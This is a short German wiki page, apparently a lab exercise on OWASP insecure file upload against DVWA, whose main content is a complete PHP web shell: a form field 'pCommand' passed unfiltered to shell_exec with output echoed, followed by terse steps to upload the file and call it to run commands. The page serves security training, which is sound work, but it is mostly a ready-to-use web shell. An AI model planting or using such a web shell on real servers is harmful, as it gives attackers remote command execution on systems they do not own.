OWASP File Upload Kommando Ausführung

Aus Xinux Wiki
Zur Navigation springen Zur Suche springen

file.php

Dieser PHP File so später Kommandos ausführen

<form action="" method="post" enctype="application/x-www-form-urlencoded">

Please enter system command

 
Command <input type="text" name="pCommand" size="50">
 

<input type="submit" value="Execute Command" />

</form> <?php if (isset($_REQUEST["pCommand"])) { echo "<pre>"; echo shell_exec($_REQUEST["pCommand"]); echo "</pre>"; }//end if ?>

Upload File

Datei aufrufen

Kommando aufrufen

Dvwa-3.png

Abgerufen von „http://wiki.ixheim.de/index.php?title=OWASP_File_Upload_Kommando_Ausführung&oldid=26053